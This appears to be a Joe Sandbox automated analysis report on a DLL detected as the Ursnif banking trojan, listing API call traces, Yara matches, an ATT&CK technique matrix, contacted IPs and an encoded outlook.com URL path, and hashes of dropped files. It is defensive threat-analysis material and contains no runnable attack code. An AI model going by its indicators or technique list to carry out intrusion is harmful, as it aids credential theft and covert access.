            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA9135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1DB23D __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara matchFile source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara matchFile source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 12 | Masquerading 1 | OS Credential Dumping | System Time Discovery 2 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 12 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Security Software Discovery 11 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap |  | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | File and Directory Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Information Discovery 23 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
            (Trailing digits after a technique name are the superscript counts shown in the original matrix.)

            Behavior Graph

            [Behavior graph image not reproduced. Recoverable content: Behavior Graph ID 446420, sample c36.dll, start date 09/07/2021, architecture WINDOWS, score 72. Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Yara detected Ursnif.]
            [Process flow: loaddll32.exe (signatures: Writes or reads registry keys via WMI; Writes registry values via WMI) starts rundll32.exe (signature: Writes registry values via WMI), a second rundll32.exe (which starts WerFault.exe), cmd.exe (which starts rundll32.exe) and 2 other processes. iexplore.exe starts a child iexplore.exe that contacts outlook.com 40.97.128.194:443 and 52.97.201.194:443 (both MICROSOFT-CORP-MSN-AS-BLOCKUS, United States) and 5 other IPs or domains.]

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            c36.dll | 3% | Metadefender |
            c36.dll | 14% | ReversingLabs | Win32.Trojan.Ursnif

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            5.2.rundll32.exe.1180000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
            2.2.loaddll32.exe.2ea0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://www.wikipedia.com/ | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            outlook.com | 40.97.128.194 | true | false |  | high
            ZRH-efz.ms-acdc.office.com | 52.98.163.18 | true | false |  | high
            www.outlook.com | unknown | unknown | false |  | high
            outlook.office365.com | unknown | unknown | false |  | high

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://outlook.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crw | false |  | high

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.wikipedia.com/ | msapplication.xml6.24.dr | false | URL Reputation: safe | unknown
            http://www.amazon.com/ | msapplication.xml.24.dr | false |  | high
            http://www.nytimes.com/ | msapplication.xml3.24.dr | false |  | high
            https://outlook.office365.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2 | {6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat.24.dr | false |  | high
            http://www.live.com/ | msapplication.xml2.24.dr | false |  | high
            http://www.reddit.com/ | msapplication.xml4.24.dr | false |  | high
            http://www.twitter.com/ | msapplication.xml5.24.dr | false |  | high
            http://www.youtube.com/ | msapplication.xml7.24.dr | false |  | high

            Contacted IPs

            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            40.97.128.194 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            52.97.201.194 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
            52.98.163.18 | ZRH-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false

            General Information

            Joe Sandbox Version: 32.0.0 Black Diamond
            Analysis ID: 446420
            Start date: 09.07.2021
            Start time: 15:22:18
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 9m 45s
            Hypervisor based Inspection enabled: false
            Report type: light
            Sample file name: c36.dll
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed: 34
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal72.troj.winDLL@17/18@3/3
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 15.1% (good quality ratio 14.3%)
            • Quality average: 79.2%
            • Quality standard deviation: 28.9%
            HCA Information:
            • Successful, ratio: 80%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .dll
            Warnings:
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 23.54.113.53, 52.147.198.201, 52.255.188.83, 95.100.54.203, 104.43.139.144, 13.64.90.137, 20.82.210.154, 2.18.105.186, 20.82.209.183, 152.199.19.161, 23.10.249.43, 23.10.249.26
            • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
            • Not all processes were analyzed; report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/446420/sample/c36.dll

            Simulations

            Behavior and APIs

            Time | Type | Description
            15:24:11 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
            15:24:51 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

            Joe Sandbox View / Context

            IPs

            Match | Associated Sample Name / URL | Detection | Context
            40.97.128.194 | http://outlook.com/owa/airmasteraustralia.onmicrosoft.com | malicious | outlook.com/owa/airmasteraustralia.onmicrosoft.com

                                    Domains

            Match | Associated Sample Name / URL | Detection | Context

                                    ASN

                                    Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
                                    Associated Sample Name / URL             Detection    Context
                                    2oxhsHaX3D.exe                           malicious    13.107.4.50
                                    iKcDLx5Wxc.exe                           malicious    104.43.139.144
                                    r6.zip.exe                               malicious    52.239.214.132
                                    recovered_bin2                           malicious    52.228.135.155
                                    Cmh_Fax-Message-3865.html                malicious    20.199.16.46
                                    5.dll                                    malicious    40.97.116.82
                                    sud-life-mobcast.apk                     malicious    104.45.180.93
                                    sud-life-outwork.apk                     malicious    104.45.180.93
                                    Flwphoptcdyxlxhpejlfjgmsyzqkhoqweu.exe   malicious    20.80.30.45
                                    2790000.dll                              malicious    40.101.136.2
                                    2770174.dll                              malicious    40.101.136.2
                                    60e40fb428612.dll                        malicious    52.97.201.18
                                    9cYXsscTTT.exe                           malicious    104.42.151.234
                                    TestTakerSBBrowser.exe                   malicious    137.117.66.167
                                    mJSDCeNxFi.exe                           malicious    40.88.32.150
                                    oEE058tCoG.exe                           malicious    40.93.212.0
                                    zHUScMPOlZ.dll                           malicious    40.97.116.82
                                    hsIF8b0YX1.msi                           malicious    191.235.71.131
                                    x86_x64_setup.exe                        malicious    104.43.193.48
                                    h3hlbLDpl8.exe                           malicious    13.64.90.137

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_06e156cd\Report.wer
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):12274
                                    Entropy (8bit):3.7606060797507106
                                    Encrypted:false
                                    SSDEEP:192:orivB0oXSHygO+jed+k/u7skS274ItWcb:sinXqygO+jeR/u7skX4ItWcb
                                    MD5:E1949ED2D76CA2F7E656F75525C7214A
                                    SHA1:5B0DE9CE68B04F1D3B9D47663E295C08915D5B48
                                    SHA-256:E8046A932885BEEB5825A245B4FE4E4D8DF59F8BA5AFF5CE4936E80039FE0BC4
                                    SHA-512:AC9E9CE727C490D0AC9D14D4EB520D2DB606E8C0FF500801B52F0082CFF2D65E20A9593223CC73249072D8FFD5C72EB932A8ACD3B1985C964B586669EB895F2A
                                    Malicious:false
                                    Reputation:low
                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.0.3.4.3.0.8.1.4.0.3.0.4.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.0.3.4.3.0.8.8.7.6.2.4.0.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.c.6.c.e.2.7.-.4.8.f.2.-.4.c.d.a.-.b.b.9.d.-.f.9.7.6.2.5.a.c.d.9.1.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.5.e.4.e.5.f.-.1.4.6.7.-.4.0.4.a.-.a.e.2.9.-.f.1.0.6.8.6.6.1.0.8.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.6.0.-.0.0.0.1.-.0.0.1.7.-.0.9.5.f.-.1.8.0.2.1.1.7.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER301B.tmp.dmp
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Fri Jul 9 22:24:43 2021, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):60620
                                    Entropy (8bit):1.9423513089497042
                                    Encrypted:false
                                    SSDEEP:192:EJWIVZo6IqaxddJaMiFNG9NLtW5CunXlcW8YGUvDcWChpjCOmHtasnomQNqpW:WWI7olJxdbaMZ9FtWs2+WfLc9hCOuRh8
                                    MD5:1380CF80AF689C5D543F9B1B8986CDD8
                                    SHA1:B1C78C558C739C72F7196C32387B31CFDBF06761
                                    SHA-256:817B2C2DE7DBD5A81947B3D95CA0B129979E7A91AD1E91AC40B37C23DBF7ED9D
                                    SHA-512:F6B2994752EC0B2219832DEE02E10BE6C0A4135D4DE82034F35522ABEC0E8F382F7F26D078B3E2FDC531297A3D1EABEBF685371EBCE554B81D6FC590F922C522
                                    Malicious:false
                                    Reputation:low
                                    Preview: MDMP....... ..........`...................U...........B......`.......GenuineIntelW...........T.......`...R..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3ADA.tmp.WERInternalMetadata.xml
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8298
                                    Entropy (8bit):3.691360413633455
                                    Encrypted:false
                                    SSDEEP:192:Rrl7r3GLNiLR64pP26Y+V6sygmfTkOSzCpDO89bTOsfkRm:RrlsNi96KP26Yk65gmfTkOSUTNfP
                                    MD5:FF60444ABF2A813A7A238F2090DDF462
                                    SHA1:F5F60E50620687E086BA77DE4EC6FBA1244D31E4
                                    SHA-256:615243FDCD5BE5E6BF8412BB2BCDECE152E85883035283F04323D15B87FB5812
                                    SHA-512:5A0C913CB7C718C38556DC03EDE5CE97C50EDCFE18703559E07B65ADDCE32761716F13D46BD5A5362C0A0A4EF3BDF438F17741635A9EDA55B749D3ADBC270229
                                    Malicious:false
                                    Reputation:low
                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.3.2.<./.P.i.d.>.......
                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DF8.tmp.xml
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4630
                                    Entropy (8bit):4.450079077396599
                                    Encrypted:false
                                    SSDEEP:48:cvIwSD8zs1JgtWI9r6P4WSC8BY8fm8M4JCds9FGx+q8/5q4SrS8ad:uITfPd5SN7JUxhDW/d
                                    MD5:56585D25B96640D7B66A5F2EBBA9D865
                                    SHA1:4B804FF08F079C98479A38C534F4851105E50D8C
                                    SHA-256:DEA4C309F7BE0022283E2B78CFFE988C01CDDCBA96039838674633FD11485029
                                    SHA-512:ADB806984E748F66AA5AFE42C06BFFD3638B9A3ECD8C364CE6776D7EF08531DDA96D32A3C6524FCEC083A9F84B61417899F834166CDD267C1EC994A2F3418844
                                    Malicious:false
